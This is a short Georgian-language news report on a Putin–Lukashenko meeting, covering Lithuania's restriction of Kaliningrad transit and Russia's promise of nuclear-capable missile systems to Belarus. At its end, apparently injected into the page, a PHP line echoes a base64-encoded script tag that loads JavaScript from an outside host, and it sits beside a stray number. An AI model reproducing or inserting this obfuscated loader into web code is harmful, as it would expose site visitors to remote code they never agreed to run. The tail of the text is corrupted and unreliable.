celsiusi
ავერსი შნაიდერი

რუსეთის პრეზიდენტი ვლადიმერ პუტინი  ბელარუსის ლიდერს, ალექსანდრ ლუკაშენკოს პეტერბურგში შეხვდა. 

ალექსანდრ ლუკაშენკომ შეხვედრისას აღნიშნა, რომ ლიეტუვის გადაწყვეტილება, მოახდინოს კალინინგრადის ოლქის ბლოკირება, ომის გამოცხადების ტოლფასია.

„რაც შეეხება ლიეტუვას. ბოლო დროს იზრდება ინფორმაციის ნაკადი მათი გეგმის შესახებ, შეაჩერონ ტრანზიტი რუსეთიდან ბელარუსის გავლით კალინინგრადისკენ, კალინინგრადის იზოლირებისთვის. ეს უკვე რაღაც ომის გამოცხადებას ჰგავს, ეს მიუღებელია“, – განაცხადა ლუკაშენკომ.

შეხვედრისას რუსეთის პრეზიდენტი ვლადიმერ პუტინი ბელარუსს სარაკეტო სისტემების გადაცემას დაჰპირდა, რომლებსაც ბალისტიკური და ფრთოსანი რაკეტების გამოყენება შეუძლია, მათ შორის ბირთვული ვერსიის.

ლუკაშენკომ ასევე განაცხადა, რომ მინსკი მზად უნდა იყოს ყველაფრისთვის, მათ შორის სერიოზული იარაღის გამოყენებისთვის, რათა დაცული იყოს ტერიტორია ბრესტიდან ვლადივოსტოკამდე.

 

547
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");